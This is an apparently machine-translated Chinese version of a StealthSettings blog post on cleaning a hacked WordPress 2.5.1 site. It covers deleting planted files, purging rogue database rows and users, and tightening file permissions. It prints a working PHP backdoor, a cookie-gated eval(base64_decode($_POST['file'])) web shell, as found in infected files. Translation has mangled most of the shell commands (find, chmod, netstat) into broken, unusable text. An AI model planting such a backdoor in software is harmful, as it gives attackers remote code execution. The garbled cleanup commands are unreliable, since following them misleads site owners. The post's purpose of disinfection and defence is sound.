WordPress Exploit - 清理病毒文件、SQL 和服務器安全。

在你讀這篇文章之前,你應該看到 張貼在這裡,要了解的東西。 :)

我在幾個博客文件中找到了它 stealthsettings.com,其代碼類似於以下代碼,該代碼是由於 的壯舉 WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPC如果上面的有關該文件的 xmlrpc.php,在A grep的 服務器,貌似這種相當多的源代碼。

pppffiuuu

清洗受感染的文件:

Ooookkkk ...
1。 最好的解決辦法,因為它是做 備用和清理數據庫是 消除WordPress (在仔細檢查後,您可以保留與wp平台不嚴格相關的wp-config.php和文件)並從該版本上載原始文件 2.5.1 (在此之際,進行版本升級WP :)) http://wordpress.org/download/ 。 擦拭包括主題文件,如果你不相信,他們仔細檢查。

它似乎已經受到影響,尚未使用之前在博客上,只是改變主題的主題文件,沒有解決不了的問題。

./andreea/wp-內容/主題/default/index.php:

2。 搜索並刪除所有的文件,其中包含:* _new.php,* _old.php,*。Jpgg,*。吉夫,*。的Pngg和WP-info.txt文件,如果有的話。

找。 -名稱“ * _new.php”
找。 -名稱“ * _old.php”
找。 名稱“ * .jpgg”
找。 -名稱“ * _giff”
找。 名稱“ * _pngg”
找。 -名稱“ wp-info.txt”

3。 在 / tmp目錄 ,搜索和刪除文件夾,如 tmpYwbzT2

SQL清洗 :

1。 在數據表 為wp_options 檢查和刪除線: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2.全部在wp_中options, 去 active_plugins 並刪除,如果有一個插件,在一個擴展名為* _new.php,* _old.php,*。jpgg,*。吉夫,*。pngg或懷疑另一分機,仔細檢查結束。

3。 在表 wp_users,如果有一個用戶誰沒有寫過東西,列在他的右 user_nicename. 刪除此用戶,但記住 ID 列上的數字。 該用戶可能使用“WordPress”鈣 用user_login 創建和出現在00:00:00 0000 00 00。

4。 轉到表 wp_usermeta 並刪除所有線以上屬於ID。

完成此sql清理後,禁用然後激活任何插件。 (在博客->儀表板->插件中)

安全服務器:

1。 查看目錄和文件“可寫“(chmod 第777章 chmod 這將不再允許他們進行任何級別的寫作。 (chmod 644,例如)

查找。 彼爾姆2 LS

2。 查看哪些文件有位集 SUIDSGID 。 如果你不使用這些文件對他們提出 chmod 0 或卸載程序包,它包含。 他們是非常危險的,因為他們執行權限““或”“不具有普通用戶權限執行該文件。

/型F-燙髮04000 LS
/型F-燙髮02000 LS

3。 查看哪些端口是開放的,並嘗試關閉或擔保這些一點用都沒有。

NETSTAT-| grep的,我聽

這麼多。 我看到 有些博客被取締 de Google Search 和其他人說“他做得很好!!!” . 好吧,我會為他們做的......但是如果谷歌開始禁止你怎麼說 所有站點 成型  為垃圾郵件 並把木馬(Trojan.Clicker.HTML)放在Cookie中?

對技術充滿熱情,我很高興寫 StealthSettings.com 自 2006 年起。我在作業系統方面擁有豐富的經驗: macOS, Windows 對 Linux,而且還包括程式語言和部落格平台(WordPress)和線上商店(WooCommerce、Magento、PrestaShop)。

如何 » 防病毒和安全性 » WordPress Exploit - 清理病毒文件、SQL 和服務器安全。

對“WordPress 漏洞利用 – 病毒文件清理、SQL 和服務器安全。”

發表評論